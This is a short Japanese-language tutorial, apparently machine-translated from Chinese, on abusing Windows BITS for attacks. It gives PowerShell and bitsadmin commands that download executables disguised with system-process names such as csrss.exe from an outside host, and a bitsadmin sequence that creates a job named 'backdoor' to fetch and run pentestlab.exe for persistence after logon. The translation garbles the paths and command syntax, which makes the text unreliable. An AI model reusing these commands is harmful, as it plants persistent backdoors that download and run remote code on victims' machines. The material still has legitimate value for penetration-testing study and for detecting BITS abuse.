一、ビット求人
Windowsのバックグラウンドインテリジェント転送サービスバックグラウンドインテリジェント転送サービス(BITS)、HTTP、またはファイル転送のためのSMB、それは他のアプリケーションのためのネットワークリソースを占有しないように、スマート規制の帯域幅、タスクと非同期ダウンロードに優先度を設定することができます。
PowerShellとbitsadmin.exeがBITSジョブ、PowerShellを作成および管理するために使用することができますが、唯一のファイル転送をサポートしているようで転送が完了した後に、Windowsネイティブbitsadmin.exeプログラムはまた、コードの実装をサポートしています。
二、実行
#PowerShellの传输文件 スタート-BitsTransfer -Source http://192.168.240.135/csrss.exe - デスティネーションC:\ Users \ユーザーwin10 \デスクトップ\のCsrss.exe #のbitsadminツール传输文件 bitsadmin /転送テスト/ダウンロード/優先度の高いのhttp: //192.168.240.135/ acrotray.exe C:\ Users \ユーザーwin10 \デスクトップ\ acrotray.exe
以下の方法はbitsjobを構築するために使用することができ、完全なまたはそれをキャンセルし、システムが自動的にキャンセル、または90日になる場合を除き、bitsjobは、ユーザー対話型ログオン後に自動的に実行しました。これは、常駐の目的を達成します
#ダウンロードした後の実行可能ファイル(のpythonは、単純なHttpServerを10054エラーがかかりますが、このステップはローカルの実験ではありません) bitsadmin / バックドアを作成します bitsadmin / ADDFILEバックドア" http://10.0.2.21/pentestlab.exe " " Cの:\ TMP \ pentestlab。 EXE " bitsadmin / SetNotifyCmdLineバックドアC:\ TMP \ pentestlab.exe NUL bitsadmin / 再開バックドア #完了またはキャンセルbitsjobの bitsadmin / 完全なバックドアの bitsadmin /バックドアをキャンセル